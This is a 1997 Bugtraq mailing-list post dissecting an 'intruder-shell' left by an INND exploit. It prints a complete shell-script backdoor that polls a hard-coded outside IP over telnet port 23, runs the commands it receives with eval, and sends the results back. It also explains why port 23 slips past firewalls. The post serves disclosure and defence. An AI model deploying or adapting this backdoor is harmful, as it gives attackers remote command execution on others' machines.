[4188] in bugtraq
[INND exploit] The "intruder-shell"
daemon@ATHENA.MIT.EDU (Rikhardur Egilsson)
Tue Mar 18 20:20:14 1997
Date: Tue, 18 Mar 1997 18:14:06 +0000
Reply-To: Rikhardur Egilsson <k97161@SKYRR.IS>
From: Rikhardur Egilsson <k97161@SKYRR.IS>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199703181624.LAA06978@feline.nrnsinc.on.ca>
The "intruder-shell" is the following /bin/sh program:
while :; do
IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
if [ X"$IN" != X"$OIN" ]; then
(/bin/sleep 2; eval "$IN" 2>&1) |
/bin/telnet 193.12.106.100 23 >/dev/null 2>&1
OIN=$IN
fi
sleep 30
done
I will now try to explain how it works,
repeat(forever)
wait 2 seconds;
connect to port 23 on 193.12.106.100;
put the last line of what '193.12.106.100' gives us in variable $IN
if $IN does not equal $OIN (Old IN)
wait 2 seconds;
evaluate $IN as a command and send the results to '193.12.106.100'
(f.ex. $IN could be '/bin/ls -l /etc' )
assign the value of $IN to $OIN
end // if
wait 30 seconds
end // repeat
The port '23' is by no means a 'randomly choosed port'.
It is choosed, because, even if most ports to/from a site are blocked
with a router/firewall, port 23 is very often allowed to connect to
the outside world.
The reason ?? : Port 23 is the 'telnet' port. i.e. if a domain allows
telnet connections out from it's news-server we're in luck !
--
rikardur@skyrr.is - Skyrr Ltd - Iceland Information Management
Rikhardur Egilsson - System Programmer - UNIX Admin - Tel : +354-5695100
Armuli 2 - IS-108 Reykjavik - Iceland - Fax : +354-5695251
